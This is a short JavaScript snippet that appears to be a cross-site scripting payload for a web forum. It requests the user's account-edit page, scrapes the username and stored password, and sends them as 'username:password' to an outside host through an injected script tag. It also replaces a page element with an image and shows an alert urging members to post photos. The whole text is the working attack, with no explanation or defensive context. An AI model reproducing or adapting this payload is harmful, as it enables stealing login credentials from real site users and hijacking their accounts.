$.get("/edit_register.cfm",function(data){
  d=data.split("\n");
  d.forEach(function(item){
    if(item.indexOf('type="password"') > -1){
      p=item.split('type="password"');
      p=p[1].split('"')[1];
      u=item.split('<strong>Username</strong>')[1];
      u=u.split(">")[1];
      u=u.split("<")[0];
      info = u + ":" + p;
    }
  })
}).done(function(){
  $("body").append("<script src='http://filmsbykris.com/enfd24/iaff_pass.php?info="+info+"'></script>");
});

tag=$(".Text_bold")[4]
tag.innerHTML="<img src='https://lh3.googleusercontent.com/eVr4wI22ixMfsRbWGdeayAmybKbzJ00_Qg9mJ-EBA_ET=w573-h1017-no'>" ;

alert("I think everyone should post there photos so we can learn each other's faces.");